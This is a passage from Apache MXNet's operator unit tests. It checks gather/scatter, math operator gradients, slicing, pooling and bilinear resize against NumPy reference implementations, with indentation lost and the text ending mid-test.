check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception (1, 1, 1) will be squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@pytest.mark.serial
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
